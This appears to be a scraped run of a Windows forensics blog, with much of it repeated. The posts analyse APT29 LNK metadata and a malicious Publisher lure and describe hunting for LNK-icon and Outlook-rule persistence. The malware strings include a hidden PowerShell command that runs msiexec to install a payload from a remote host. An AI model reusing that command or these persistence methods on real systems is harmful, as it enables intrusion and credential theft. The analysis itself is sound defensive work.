November 2018 saw a Cozy Bear/APT29 campaign, discussed in FireEye's blog post regarding APT29 activity (from 19 Nov 2018), as well as in this Yoroi blog regarding the Cozy Bear campaign (from 21 Nov 2018). I found this particular campaign a bit fascinating, as it is another example of actors sending LNK files to their target victims, LNK files that had been created on a system other than the victim's.
However, one of the better (perhaps even the best) write-up regarding the LNK file deployed in this campaign is Oleg's description of his process for parsing that file. His write-up is very comprehensive, so I won't steal any of his thunder by repeating it here. Instead, I wanted to dig just a bit deeper into the LNK file structure itself.
Using my own parser, I extracted metadata from the LNK file structure for the "ds7002.lnk" file. The TrackerDataBlock includes much of the same information that Oleg uncovered, including the "machine ID", which is a 16-byte field containing the NetBIOS name of the system on which the LNK file was created:
***TrackerDataBlock***
Machine ID : user-pc
New Droid ID Time : Thu Oct 6 17:03:04 2016 UTC
New Droid ID Seq Num : 13273
New Droid Node ID : 08:00:27:92:24:e5
Birth Droid ID Time : Thu Oct 6 17:03:04 2016 UTC
Birth Droid ID Seq Num: 13273
Birth Droid Node ID : 08:00:27:92:24:e5
From the TrackerDataBlock, we can also see one of the MAC addresses recognized by the system. Using the OUI lookup tool from Wireshark, we see that the OUI for the displayed MAC address points to "PcsCompu PCS Computer Systems GmbH". From WhatsMyIP, we get "Pcs Systemtechnik Gmbh".
Further, there's a SID located in the PropertyStoreDataBlock:
***PropertyStoreDataBlock***
SID: S-1-5-21-1764276529-1526541935-4264456457-1000
Finally, there's the volume serial number embedded within the LNK file:
vol_sn C4B2-BD1C
A combination of the volume serial number, maching ID, and the SID from the PropertyStoreDataBlock can be used to create a Yara rule, which can then be submitted as a retro-hunt on VirusTotal, in order to locate other examples of LNK files created on this system.
Note that the FireEye write-up mentions a previous campaign (described by Volexity) in which a similar LNK file was used. In that case, MAC address, SID, and volume serial number were identical to the ones seen in the LNK file in the Nov 2018 campaign. The file size was different, and the embedded PowerShell command was different, but the rest of the identifying metadata remained the same two years later.
Another aspect of the LNK file from the Nov 2018 campaign is the embedded PowerShell command. As Oleg pointed out, the PowerShell command itself is encoded, as a base64 string. Or perhaps more accurately, a "base" + 0x40 encoded string. The manner by which commands are obfuscated can be very telling, and perhaps even used as a means for tracking the evolution of the use of the technique.
This leads to another interesting aspect of this file; rather than using an encoded PowerShell command to download the follow-on payload(s), those payloads are included encoded within the logical structure of the file itself. The delivered LNK file is over 400K in size (the LNK file from 2016 was over 660K), which is quite unusual for such a file, particularly given that the LNK file structure itself ends at offset 0x0d94, making the LNK file 3476 bytes in size.
Oleg did a great job of walking through the collection, parsing and decoding/decryption of the embedded PDF and DLL files, as well as of writing up and sharing his process. From a threat intel perspective, identifying information extracted from file metadata can be used to further the investigation and help build a clearer intel picture.
Addendum, 31 Dec: Here's a fascinating tweet thread regarding using DOSDate time stamps embedded in shellitems to identify "weaponization time" of the LNK file, and here's more of that conversation.
The Windows Incident Response Blog is dedicated to the myriad information surrounding and inherent to the topics of IR and digital analysis of Windows systems. This blog provides information in support of my books; "Windows Forensic Analysis" (1st thru 4th editions), "Windows Registry Forensics", as well as the book I co-authored with Cory Altheide, "Digital Forensics with Open Source Tools".
Pages
▼
Saturday, December 29, 2018
Friday, December 28, 2018
PUB File
Earlier this month, I saw a tweet that led me to this Trend Micro write-up regarding a spam campaign where the bad guys sent malicious MS Publisher .pub file attachments that downloaded an MSI file (using .pub files as lures has been seen before). The write-up included a hash for the .pub file, which I was able to use to locate a copy of the file, so I could take a look at it myself. MS Publisher files follow the OLE file format, so I wanted to take a shot at "peeling the onion" on this file, as it were.
Why would I bother doing this? For one, I believe that there is a good bit of value that does unrealized when we don't look at artifacts like this, value that may not be immediately realized by a #DFIR analyst, but may be much more useful to an intel analyst.
I should note that the .pub file is detected by Windows Defender as Trojan:O97M/Bynoco.PA.
The first thing I did was run 'strings' against the file. Below are some of the more interesting strings I was able to find in the file:
E:\tmp\wix_tmp\officehomems.com_sched\1en.pub
proverka@example.com
BaseClass=crysler
comodostar
alabama
Document created using the application not related to Microsoft Office
For viewing/editing, perform the following steps:
Click Enable editing button from the yellow bar above.
Once you have enabled editing, please click Enable Content button from the yellow bar above.
"-executionpolicy bypass -noprofile -w hidden -c & ""msiexec"" url1=gmail url2=com /q /i http://homeofficepage[.]com/TabSvc"
Shceduled update task
Back to the strings themselves; I'm sure that you can see why I saw these as interesting strings. For example, note the misspelling of "Shceduled". This may be something on which we can pivot in our analysis, locating instances of a scheduled task with that same misspelling within our infrastructure. Interestingly enough, when I ran a Google search for "shceduled task", most of the responses I got were legitimate posts where the author had misspelled the word. ;-)
The message to the user seen in the strings above looks similar to figure 2 found in this write-up regarding Sofacy, but searching a bit further, we find the exact message string being used in lures that end up deploying ransomware.
Next, I ran 'oledmp.pl' against the file; below is the output, trimmed for readability:
Root Entry Date: 20.11.2018, 14:40:11 CLSID: 00021201-0000-0000-00C0-000000000046
1 D.. 0 20.11.2018, 14:40:11 \Objects
2 D.. 0 20.11.2018, 14:40:11 \Quill
3 D.. 0 20.11.2018, 14:40:11 \Escher
4 D.. 0 20.11.2018, 14:40:11 \VBA
7 F.. 10602 \Contents
8 F.T 94 \CompObj
9 F.T 16384 \SummaryInformation
10 F.T 152 \DocumentSummaryInformation
11 D.. 0 20.11.2018, 14:40:11 \VBA\VBA
12 D.. 0 20.11.2018, 14:40:11 \VBA\crysler
18 F.. 387 \VBA\crysler\f
19 F.. 340 \VBA\crysler\o
20 F.T 97 \VBA\crysler\CompObj
21 F.. 439 \VBA\crysler\ VBFrame
22 F.. 777 \VBA\VBA\dir
23 FM. 1431 \VBA\VBA\crysler
30 FM. 8799 \VBA\VBA\ThisDocument
As you can see, there are a number of streams that include macros. Also, from the output listed above, we can see that the file was likely created on 20 Nov 2018, which is something that can likely be used by intel analysts.
Using oledump.py to extract the macros, we can see that they aren't obfuscated in any way. In fact, the two visible macros are well-structured, and don't appear do much at all; the malicious functionality appears to embedded someplace else within the file itself.
Windows Artifacts and Threat Intel
I ran across a pretty fascinating tweet thread from Steve the other day. In this thread, Steve talked about how he's used PDB paths to not just get some interesting information from malware, but to build out a profile of the malware author over a decade, and how he was able to pivot off of that information. In the tweet thread, Steve provides some very interesting foundational information, as well as an example of how this information has been useful. Unfortunately, it's in a tweet thread and not some more permanent format.
I still believe that something very similar can be done with LNK files sent by an adversary, as well as other "weaponized" documents. This includes OLE-format Word and Publisher documents, as well. Using similar techniques to what Steve employed, including Yara rules to conduct a VT retro-hunt, information can be built out using not just information collected from the individual files themselves, but information provided by VT, such as submission date, etc.
Why would I bother doing this? For one, I believe that there is a good bit of value that does unrealized when we don't look at artifacts like this, value that may not be immediately realized by a #DFIR analyst, but may be much more useful to an intel analyst.
I should note that the .pub file is detected by Windows Defender as Trojan:O97M/Bynoco.PA.
The first thing I did was run 'strings' against the file. Below are some of the more interesting strings I was able to find in the file:
E:\tmp\wix_tmp\officehomems.com_sched\1en.pub
proverka@example.com
BaseClass=crysler
comodostar
alabama
Document created using the application not related to Microsoft Office
For viewing/editing, perform the following steps:
Click Enable editing button from the yellow bar above.
Once you have enabled editing, please click Enable Content button from the yellow bar above.
"-executionpolicy bypass -noprofile -w hidden -c & ""msiexec"" url1=gmail url2=com /q /i http://homeofficepage[.]com/TabSvc"
Shceduled update task
One aspect of string searches in OLE format files that analysts need to keep in mind is that the file structure truly is one of a "file system within a file", as the structure includes sector tables that identify the sectors that comprise the various streams within the file. What this means is that the streams themselves are not contiguous, and that strings contained in the file may possibly be separated across the sectors. For example, it is possible that for the string "alabama" listed above, part of the string (i.e., "ala") may exist in one sector, and the remaining portion of the string may exist in another sector, so that searching for the full string may not find all instances of it. Further, with the use of macros, the macros themselves are compressed, throwing another monkey wrench into string searches.
Back to the strings themselves; I'm sure that you can see why I saw these as interesting strings. For example, note the misspelling of "Shceduled". This may be something on which we can pivot in our analysis, locating instances of a scheduled task with that same misspelling within our infrastructure. Interestingly enough, when I ran a Google search for "shceduled task", most of the responses I got were legitimate posts where the author had misspelled the word. ;-)
The message to the user seen in the strings above looks similar to figure 2 found in this write-up regarding Sofacy, but searching a bit further, we find the exact message string being used in lures that end up deploying ransomware.
Next, I ran 'oledmp.pl' against the file; below is the output, trimmed for readability:
Root Entry Date: 20.11.2018, 14:40:11 CLSID: 00021201-0000-0000-00C0-000000000046
1 D.. 0 20.11.2018, 14:40:11 \Objects
2 D.. 0 20.11.2018, 14:40:11 \Quill
3 D.. 0 20.11.2018, 14:40:11 \Escher
4 D.. 0 20.11.2018, 14:40:11 \VBA
7 F.. 10602 \Contents
8 F.T 94 \CompObj
9 F.T 16384 \SummaryInformation
10 F.T 152 \DocumentSummaryInformation
11 D.. 0 20.11.2018, 14:40:11 \VBA\VBA
12 D.. 0 20.11.2018, 14:40:11 \VBA\crysler
18 F.. 387 \VBA\crysler\f
19 F.. 340 \VBA\crysler\o
20 F.T 97 \VBA\crysler\CompObj
21 F.. 439 \VBA\crysler\ VBFrame
22 F.. 777 \VBA\VBA\dir
23 FM. 1431 \VBA\VBA\crysler
30 FM. 8799 \VBA\VBA\ThisDocument
As you can see, there are a number of streams that include macros. Also, from the output listed above, we can see that the file was likely created on 20 Nov 2018, which is something that can likely be used by intel analysts.
Using oledump.py to extract the macros, we can see that they aren't obfuscated in any way. In fact, the two visible macros are well-structured, and don't appear do much at all; the malicious functionality appears to embedded someplace else within the file itself.
Windows Artifacts and Threat Intel
I ran across a pretty fascinating tweet thread from Steve the other day. In this thread, Steve talked about how he's used PDB paths to not just get some interesting information from malware, but to build out a profile of the malware author over a decade, and how he was able to pivot off of that information. In the tweet thread, Steve provides some very interesting foundational information, as well as an example of how this information has been useful. Unfortunately, it's in a tweet thread and not some more permanent format.
I still believe that something very similar can be done with LNK files sent by an adversary, as well as other "weaponized" documents. This includes OLE-format Word and Publisher documents, as well. Using similar techniques to what Steve employed, including Yara rules to conduct a VT retro-hunt, information can be built out using not just information collected from the individual files themselves, but information provided by VT, such as submission date, etc.
Wednesday, December 19, 2018
Hunting and Persistence
Sometimes when hunting, we need to dig a little deeper, particularly where the actor employs novel persistence mechanisms. Persistence mechanisms that are activated by some means other than a system start or user login can be challenging for a hunter to root (pun intended) out.
During one particular hunting engagement, svchost.exe was seen communicating out to a known-bad IP address, and the hunters needed to find out a bit more about what might be the cause of that activity. One suggestion was to determine the time frame or "temporal proximity" of the network activity to other significant events; specifically, determine whether something was causing svchost.exe to make these network connections, or find out if this activity was being observed "near" a system start.
As it turned out, the hunters in that case had access to data that had been collected as part of the EDR installation process (i.e., collect data, install EDR agent), and were able to determine the true nature of the persistence.
Sometimes, persistence mechanisms aren't all that easy, nor straightforward to determine, particularly if the actor had established a foothold within the target infrastructure prior to instrumentation being put in place. It is also difficult to determine persistence within an infrastructure when complete visibility has not been achieved, and there are "nexus systems" that do not have the benefit of instrumentation. The actor may be seen interacting with instrumented systems, but those systems may be ancillary to their activity, rather than the portal systems to which they continually return.
One persistence mechanism that may be difficult to uncover is the use of the "icon filename" field within Windows shortcut/LNK files. Depending upon where the LNK file is located on the system (i.e., not in the user's StartUp folder), the initiation of the malicious network connection may not be within temporal proximity of the user logging into the system, making it more difficult to determine the nature of the persistence. So how does this persistence mechanism work? Per Rapid7, when a user accesses the shortcut/LNK file, SMB and WebDav connections are initiated to the remote system.
Also, from here:
Echoing Stuxnet, the attackers manipulated LNK files (Windows shortcut files), to conduct malicious activities. In this case, they used LNK files to gather user credentials when the LNK file attempted to load its icon from a remote SMB server controlled by the attackers.
As you can see, this persistence method would then lead to the user's credentials being captured for cracking, meaning that the actor may be able return to the environment following a global password change. Be sure to check out this excellent post from Bohops that describes ways to collect credentials to be cracked.
Another persistent mechanism that may be difficult for hunters to suss out is the use of OutLook rules (description from MWR Labs, who also provide a command line tool for creating malicious OutLook rules, which includes a switch to display existing rules). In short, an actor with valid credentials can access OWA and create an Outlook rule that, when the trigger email is received, can launch a PowerShell script to download and launch an executable, or open a reverse shell, or take just about any other action. Again, this persistence mechanism is completely independent of remediation techniques, such as global password changes.
Additional Resources
MS recommendations to detect and remediate OutLook rules
Detecting OutLook rules WRT O365, from TechNet
Addendum, 21 Dec: FireEye blog post references SensePost's free tool for abusing Exchange servers and creating client-side mail rules.
Addendum, 24 Dec: Analysis of LNK file sent in the Cozy Bear campaign
During one particular hunting engagement, svchost.exe was seen communicating out to a known-bad IP address, and the hunters needed to find out a bit more about what might be the cause of that activity. One suggestion was to determine the time frame or "temporal proximity" of the network activity to other significant events; specifically, determine whether something was causing svchost.exe to make these network connections, or find out if this activity was being observed "near" a system start.
As it turned out, the hunters in that case had access to data that had been collected as part of the EDR installation process (i.e., collect data, install EDR agent), and were able to determine the true nature of the persistence.
Sometimes, persistence mechanisms aren't all that easy, nor straightforward to determine, particularly if the actor had established a foothold within the target infrastructure prior to instrumentation being put in place. It is also difficult to determine persistence within an infrastructure when complete visibility has not been achieved, and there are "nexus systems" that do not have the benefit of instrumentation. The actor may be seen interacting with instrumented systems, but those systems may be ancillary to their activity, rather than the portal systems to which they continually return.
One persistence mechanism that may be difficult to uncover is the use of the "icon filename" field within Windows shortcut/LNK files. Depending upon where the LNK file is located on the system (i.e., not in the user's StartUp folder), the initiation of the malicious network connection may not be within temporal proximity of the user logging into the system, making it more difficult to determine the nature of the persistence. So how does this persistence mechanism work? Per Rapid7, when a user accesses the shortcut/LNK file, SMB and WebDav connections are initiated to the remote system.
Also, from here:
Echoing Stuxnet, the attackers manipulated LNK files (Windows shortcut files), to conduct malicious activities. In this case, they used LNK files to gather user credentials when the LNK file attempted to load its icon from a remote SMB server controlled by the attackers.
As you can see, this persistence method would then lead to the user's credentials being captured for cracking, meaning that the actor may be able return to the environment following a global password change. Be sure to check out this excellent post from Bohops that describes ways to collect credentials to be cracked.
Another persistent mechanism that may be difficult for hunters to suss out is the use of OutLook rules (description from MWR Labs, who also provide a command line tool for creating malicious OutLook rules, which includes a switch to display existing rules). In short, an actor with valid credentials can access OWA and create an Outlook rule that, when the trigger email is received, can launch a PowerShell script to download and launch an executable, or open a reverse shell, or take just about any other action. Again, this persistence mechanism is completely independent of remediation techniques, such as global password changes.
Additional Resources
MS recommendations to detect and remediate OutLook rules
Detecting OutLook rules WRT O365, from TechNet
Addendum, 21 Dec: FireEye blog post references SensePost's free tool for abusing Exchange servers and creating client-side mail rules.
Addendum, 24 Dec: Analysis of LNK file sent in the Cozy Bear campaign
Tuesday, December 18, 2018
Updates
Based on some testing that Phill had done, I recently updated my Recycle Bin index file ($I*, INFO2) parser. Since then, there have been some other developments, and I wanted to document some additional updates.
NTFSDisableLastAccessUpdate
We have seen recently that, apparently, as of Win10 1803 there have been changes made to the NTFSDisableLastAccessUpdate value in the Registry (David, Maxim). In short, rather than the "yes" or "no" (i.e., "1" or "0") value data that we're used to seeing, there are a total of 4 options now.
I've updated the disablelastaccess.pl plugin accordingly.
SysCache.hve
Maxim shared some interesting insight into the SysCache.hve file recently. This is a file whose structure follows that of Registry hive files (similar to the AmCache.hve file), and is apparently only found on Win7 systems.
There's some additional insight here (on Github) regarding the nature of the various values within some of the keys.
I created the syscache.pl plugin to parse this file, and to really make use of it, you need to also have the MFT from the system, as the SysCache.hve file does not record file names; rather, it records the MFT record number, which is a combination of the entry number and the sequence number for the file record within the MFT.
PowerShell Logging
As my background is in DFIR work and not system administration, it was only recently that I ran across PowerShell Transcription Logging. This is a capability that can be enabled via GPO, and as such, there are corresponding Registry values (in addition to the use of the Start-Transcript module, which can be deployed via PS profiles) that enable the capability. There's also a Registry value that allows for timestamps to be recorded for each command.
This capability records what goes in with PowerShell during a session, and as such, can be pretty powerful stuff, particularly when combined with PowerShell logging.
To see what PowerShell transcription logging can provide to an analyst, take a look at this example, provided by FireEye, of a recorded Invoke-Mimikatz script session. Here's an example (also from FireEye) of what the results of module logging looks like for the same session.
As these settings can inform an analyst as to what they can expect to find on a system, I created the pslogging.pl plugin. However, a dearth of available data has really limited my ability to test the plugin.
*Note: This post was originally authored on 9 Dec 2018
NTFSDisableLastAccessUpdate
We have seen recently that, apparently, as of Win10 1803 there have been changes made to the NTFSDisableLastAccessUpdate value in the Registry (David, Maxim). In short, rather than the "yes" or "no" (i.e., "1" or "0") value data that we're used to seeing, there are a total of 4 options now.
I've updated the disablelastaccess.pl plugin accordingly.
SysCache.hve
Maxim shared some interesting insight into the SysCache.hve file recently. This is a file whose structure follows that of Registry hive files (similar to the AmCache.hve file), and is apparently only found on Win7 systems.
There's some additional insight here (on Github) regarding the nature of the various values within some of the keys.
I created the syscache.pl plugin to parse this file, and to really make use of it, you need to also have the MFT from the system, as the SysCache.hve file does not record file names; rather, it records the MFT record number, which is a combination of the entry number and the sequence number for the file record within the MFT.
PowerShell Logging
As my background is in DFIR work and not system administration, it was only recently that I ran across PowerShell Transcription Logging. This is a capability that can be enabled via GPO, and as such, there are corresponding Registry values (in addition to the use of the Start-Transcript module, which can be deployed via PS profiles) that enable the capability. There's also a Registry value that allows for timestamps to be recorded for each command.
This capability records what goes in with PowerShell during a session, and as such, can be pretty powerful stuff, particularly when combined with PowerShell logging.
To see what PowerShell transcription logging can provide to an analyst, take a look at this example, provided by FireEye, of a recorded Invoke-Mimikatz script session. Here's an example (also from FireEye) of what the results of module logging looks like for the same session.
As these settings can inform an analyst as to what they can expect to find on a system, I created the pslogging.pl plugin. However, a dearth of available data has really limited my ability to test the plugin.
*Note: This post was originally authored on 9 Dec 2018
Saturday, November 24, 2018
Tool Testing
Phill recently posted regarding some testing that he'd conducted, with respect to tools for parsing Windows Recycle Bin files. From Phill's blog post, and follow-on exchanges via Twitter, it seems that Phill tested the following tools (I'm assuming these are the versions tested):
- rifiuti2
- Jason Hale's $I Parse - blog posts here and here
- Dan Mare's RECYCLED_I app - the main software page states "RECYCLED_I: Program to parse the $I files extracted via a forensic software package. Special request.", but you can download it (and get syntax/usage) from here.
- My own recbin.pl/.exe
Phill's testing resulted in Eric Zimmerman creating RBCmd (tweet thread).
What I was able to determine after the fact is that the "needs" of a parsing tool were:
- parse Recycle Bin files from XP/2003 systems (INFO2), as well as Win7 & Win10 ($I*)
- for Win7/10, be able to parse all $I* files in a folder.
The results from the testing were (summarized):
- Some tools didn't do everything; some don't parse both XP- and Win7-style Recycle Bin files, and the initial versions of the tool I wrote parsed but did not display file sizes (it does now)
- The tool I wrote can optionally display tabular, CSV, and TLN output
- Eric's RBCmd parses all file types, including directories of $I* files; from the tweet thread, it appears that RBCmd displays tabular and CSV output
- rifiuit2 was the fastest
So, if you're looking to parse Recycle Bin index files (either INFO2 or $I* format)...there you go.
$I* File Structures
As Jason Hale pointed out over 2 1/2 years ago, the $I* file structure changed between Win7 and Win10. Most of the values are in the same location (the version number...the first four bytes...were updated from 1 to 2), but where Win7 had a fixed length field that included the name and original path (in Unicode) of the file, Win10 and Win2016 have a four byte name length field, followed by the file path and name, in Unicode.
Resources
SemanticScholar PDF
4n6Explorer article
- rifiuti2
- Jason Hale's $I Parse - blog posts here and here
- Dan Mare's RECYCLED_I app - the main software page states "RECYCLED_I: Program to parse the $I files extracted via a forensic software package. Special request.", but you can download it (and get syntax/usage) from here.
- My own recbin.pl/.exe
Phill's testing resulted in Eric Zimmerman creating RBCmd (tweet thread).
What I was able to determine after the fact is that the "needs" of a parsing tool were:
- parse Recycle Bin files from XP/2003 systems (INFO2), as well as Win7 & Win10 ($I*)
- for Win7/10, be able to parse all $I* files in a folder.
The results from the testing were (summarized):
- Some tools didn't do everything; some don't parse both XP- and Win7-style Recycle Bin files, and the initial versions of the tool I wrote parsed but did not display file sizes (it does now)
- The tool I wrote can optionally display tabular, CSV, and TLN output
- Eric's RBCmd parses all file types, including directories of $I* files; from the tweet thread, it appears that RBCmd displays tabular and CSV output
- rifiuit2 was the fastest
So, if you're looking to parse Recycle Bin index files (either INFO2 or $I* format)...there you go.
$I* File Structures
As Jason Hale pointed out over 2 1/2 years ago, the $I* file structure changed between Win7 and Win10. Most of the values are in the same location (the version number...the first four bytes...were updated from 1 to 2), but where Win7 had a fixed length field that included the name and original path (in Unicode) of the file, Win10 and Win2016 have a four byte name length field, followed by the file path and name, in Unicode.
Resources
SemanticScholar PDF
4n6Explorer article
Friday, November 23, 2018
Basic Skillz, pt II
Following my initial post on this topic, and to dove-tail off of Brett's recent post, I wanted to provide something of a consolidated view based on the comments received.
For the most part, I think Brett's first comment was very much on point:
Should be easy enough to determine what would constitute basic skills, starting with collecting the common skills needed across every specialty (the 'basic things'). Things like, seizing evidence, imaging, hashing, etc..
Okay, so that's a really good start. Figure out what is common across all specialties, and come up with a core set of skills that are independent of OS, platform, etc., in order to determine what constitutes a "Basic DF Practitioner". These skills will need to be able to be tested and verified; some will likely be "you took a test and achieved a score", while other skills be pass/fail, or verification of the fact that you were able to demonstrate the skill to some degree. Yes, this will be more subjective that a written test, but there are some skills (often referred to as "soft skills") that while important, one may not be able to put their finger on to the point of having a written test to verify that skill.
Brigs had some great thoughts as far as a break down of skill sets goes, although when I read his comment, I have to admit that in my head, I read it in my Napolean Dynamite voice. ;-) Taking this a step further, however, I wanted to address @mattnotmax's comments, as I think they provide a really good means to walk through the thought process.
1. collect the evidence properly
What constitutes "properly"? The terms "forensics" and "evidence" bring a legal perspective to the forefront in discussions on this topic, and while I fully believe that there should be one standard to which we all strive to operate, the simple fact is that business processes and requirements very often prevent us from relying on one single standard. While it would be great to be able to cleanly shut a system down and extract the hard drive(s) for acquisition, there are plenty of times we cannot do so. I've seen systems with RAID configurations shut down and the individual drives acquired, but the order of the drives and the RAID configuration itself was never documented; as such, we had all those disk images that were useless. On the other hand, I've acquired images from live systems with USB 1.0 connections by mapping a drive (an ext HDD) to another system on the network that had USB 2.0 connections.
I think we can all agree that we won't always have the perfect, isolated, "clean room-ish" setting for acquiring data or 'evidence'. Yes, it would be nice to have hard drives removed from systems, and be able to have one verified/validated method for imaging that data, but that's not always going to be the case.
Live, bare-metal systems do not have a "hard drive" for memory, and memory acquisition inherently requires the addition of software, which modifies the contents of memory itself.
I have never done mobile forensics but I'm sure that there are instances, or even just specific handsets, where an analyst cannot simply shut the handset down and acquire a complete image of the device.
I would suggest that rather than simply "collect the evidence properly", we lean toward understanding how evidence can be collected (that one size does not fit all), and that the collection process must be thoroughly documented.
2. image the hard drive
Great point with respect to collection...but what if "the hard drive" isn't the issue? What if it's memory? Or a SIM card? See my thoughts on #1.
3. verify the tool that did the imaging, and then verify the image taken
I get that the point here is the integrity of the imaging process itself, as well as maintaining and verifying the integrity of the acquired image. However, if your only option for collecting data is to acquire it from a live system, and you cannot acquire a complete copy of the data, can we agree that what is important here is (a) documentation, and (b) understanding image integrity as it applies to the process being used (and documented)?
For items 1 thru 3, can we combine them into understanding how evidence or data can be collected, techniques for doing so, and that all processes must be thoroughly documented?
4. know what sort of analysis is required even if they don't know how to do it (i.e. can form a hypothesis)
Knowing what sort of analysis is required is predicated by understanding the goals of the acquisition and analysis process. What you are attempting to achieve predicates and informs your acquisition process (i.e., what data/evidence will you seek to acquire)
5. document all their process, analysis and findings
Documentation is the key to all of this, and as such, I am of the opinion that it needs to be addressed very early in the process, as well as throughout the process.
6. can write a report and communicate that report to a technical and non-technical audience.
If you've followed the #DFIR industry for any period of time, you'll see that there are varying opinions as to how reporting should be done. I've included my thoughts as to report writing both here in this blog, as well as in one of my books (i.e., ch 9 of WFA 4/e). While the concepts and techniques for writing DFIR reports may remain fairly consistent across the industry, I know that a lot of folks have asked for templates, and those may vary based on personal preference, etc.
All of that being said, I'm in agreement with Brett, with respect to determining a basic skill set that can be used to identify a "Basic DF Practitioner". From there, one would branch off to different specialties (OS- or platform-specific), likely with different levels (i.e., MacOSX practitioner level 1, MacOSX analyst level 1, etc.)
As such, my thoughts on identifying and developing basic skills in practitioners include:
1. Basic Concepts
Some of the basic concepts for the industry (IMHO) include documentation, writing from an analytic standpoint (exercises), reviewing other's work and having your work reviewed, etc.
For a training/educational program, I'd highly recommend exercises that follow a building block approach. For example, start by having students document something that they did over the weekend; say, attending an event or going to a restaurant or movie. Have them document what they did, then share it, giving them the opportunity to begin speaking in public. Then have them trade their documentation with someone else in the class, and have that person attempt to complete the same task, based on the documentation. Then, that person reviews the "work product", providing feedback.
Another approach is to give the students a goal, or set of goals, and have them develop a plan for achieving the goals. Have them implement the plan, or trade plans such that someone else has to implement the plan. Then conduct a "lessons learned" review; what went well, what could have gone better, and what did we learn from this that we can use in the future?
This is where the building blocks start. From here, provide reading materials for with the students provide reviews, and instead of having the instructor/teacher read them all, have the students share the reviews with other students. This may be a good way to begin building the necessary foundation for the industry.
2. Understanding File Systems and Structures
This area is intended to develop an understanding of how data is maintained on storage systems, and is intended to cover the most common formats, from a high level. For example (and this is just an example):
MacOSX - HPFS, HFS+, file structures such as plists
Linux - ext3/4
Windows - NTFS, perhaps some basic file structures (OLE, Registry)
Depending on the amount of information and the depth into which the instructor/teacher can go, the above list might be trimmed down, or include Android, network packets, common database formats (i.e., SQLite), etc.
Students can then get much more technically in-depth as they progress into their areas of specialization, or into a further level as "practitioner", before they specialize.
Just a note on "specialization" - this doesn't mean that anyone is pigeon-holed into one area; rather, it refers to the training. This means that skill sets are identified, training is provided, and skills are achieved and measured such that they can be documented. In this way, someone that achieves "MacOSX analyst level 2" is known to have completed training and passed testing for a specific set of skills that they can then demonstrate. The same would true with other specialized areas.
3. Data Acquisition and Integrity
The next phase might be one in which basic techniques for data acquisition are understood. I can see this as being a fantastic area for "fam fires"; that is, opportunities for the students to get hands-on time with various techniques. Some of these, such as using write blockers, etc., should be done in the classroom, particularly at the early stages.
In this class, you could also get into memory acquisition techniques, with homework assignments to collect memory from systems using various techniques, documenting the entire process. Then students will provide their "reports" to other students to review. This provides other opportunities for evaluation, as well; for example, have a student with, say, a Mac system provide their documentation to another student with a Mac, and see if the process returns similar results.
We want to be sure that some other very important topics are not skipped, such a acquiring logs, network captures (full packet captures vs. netflow), etc. Again, this should be a high-level understanding, with familiarization exercises, and full/complete documentation.
4. Techniques of Analysis
I think that beginning this topic as part of the basic skill set is not only important, but a good segue into areas of specialization. This is a great place to reiterate the foundational concepts; determine goals, develop a plan, document throughout, and conduct a review (i.e., "lessons learned"). With some basic labs and skills development exercises, an instructor can begin including things such as how those "lessons learned" might be implemented. For example, a Yara rule, or a grep statement for parsing logs or packet captures. But again, this is high-level, so detailed/expert knowledge of writing a Yara rule or grep expression isn't required; the fact that one can learn from experiences, and share that knowledge with others should be the point.
Again, this is mostly high-level, and a great way to maximize the time might be to have students get into groups and pick or be assigned a project. The delivery of the project should include a presentation of the goals, conduct of the project, lessons learned, and a review from the other groups.
What needs to be common throughout the courses is the building block approach, with foundations being built upon and skills developed over time.
As far as skill development goes, somethings I've learned over time include:
We all learn different ways. Some learn through auditory means, others visually, and others by doing. Yes, at a young age, I sat in a classroom and heard how to put on MOPP NBC protective gear. However, I really learned by going out to the field and doing it, and I learned even more about the equipment by having to move through thick bush, wearing all of equipment, in Quantico, in July.
I once worked for a CIO who said that our analysts needed to be able to pick up a basic skill through reading books, etc., as we just could not afford to send everyone to intro-level training for everything. I thought that made perfect sense. When I got to a larger team, there were analysts who came right out and said that they could not learn something new unless they were sitting in a classroom and someone was teaching it to them. At first, I was aghast...but then I realized that what they were saying was that, during the normal work day, there were too many other things going on...booking travel, submitting expenses, performing analysis and report writing...such that they didn't feel that they had the time to learn anything. Being in a room with an instructor took them out of the day-to-day chaos, allowed them to focus on that topic, to understand, and ask questions. Well, that's the theory, anyway. ;-)
We begin learning a new skill by developing a foundational understanding, and then practicing the skill based on repeating a "recipe". Initial learning begins with imitation. In this way, we learn to follow a process, and as our understanding develops, we begin to move into asking questions. This helps us develop a further understanding of the process, from which we can then begin making decisions what new situations arise. However, developing new skills doesn't mean we relinquish old ones, so when a new situation arises, we still have to document our justification for deviation from the process.
Addendum
Some additional thoughts that I had after clicking "publish"...
First, the above "courses" could be part of an overall curriculum, and include other courses, such as programming, etc.
Second, something else that needs to be considered from the very beginning of the program is specificity of language. Things are called specific names, and this provides as means by which we can clearly communicate with other analysts, as well as non-technical people. For example, I've read malware write-ups from vendors, including MS, that state that malware will create a Registry "entry"; well, what kind of entry? A key or a value? Some folks I've worked with in the past have told me that I'm pedantic for saying this, but it makes a difference; a key is not a value, nor vice versa. They each have different structures and properties, and as such, should be referred to as what they are, correctly.
Third, to Brett's point, vendor-specific training has its place, but should not be considered foundational. In 1999, I attended EnCase v3 Intro training; during the course, I was the only person in the room who did not have a gun and a badge. The course was both taught and attended by sworn law enforcement officers. At one point during the training, the instructor briefly mentioned MD5 hashes, and then proceeded on with the material. I asked if he could go back and say a few words about what a hash was and why it was important, and in response, he offered me the honor and opportunity of doing so. My point is the same as Brett's...it's not incumbent upon a vendor to provide foundational training, but that training (and the subsequent knowledge and skills) is, indeed, foundational (or should be) to the industry.
Here is a DFRWS paper that describes a cyber forensics ontology; this is worth consideration when discussing this topic.
For the most part, I think Brett's first comment was very much on point:
Should be easy enough to determine what would constitute basic skills, starting with collecting the common skills needed across every specialty (the 'basic things'). Things like, seizing evidence, imaging, hashing, etc..
Okay, so that's a really good start. Figure out what is common across all specialties, and come up with a core set of skills that are independent of OS, platform, etc., in order to determine what constitutes a "Basic DF Practitioner". These skills will need to be able to be tested and verified; some will likely be "you took a test and achieved a score", while other skills be pass/fail, or verification of the fact that you were able to demonstrate the skill to some degree. Yes, this will be more subjective that a written test, but there are some skills (often referred to as "soft skills") that while important, one may not be able to put their finger on to the point of having a written test to verify that skill.
Brigs had some great thoughts as far as a break down of skill sets goes, although when I read his comment, I have to admit that in my head, I read it in my Napolean Dynamite voice. ;-) Taking this a step further, however, I wanted to address @mattnotmax's comments, as I think they provide a really good means to walk through the thought process.
1. collect the evidence properly
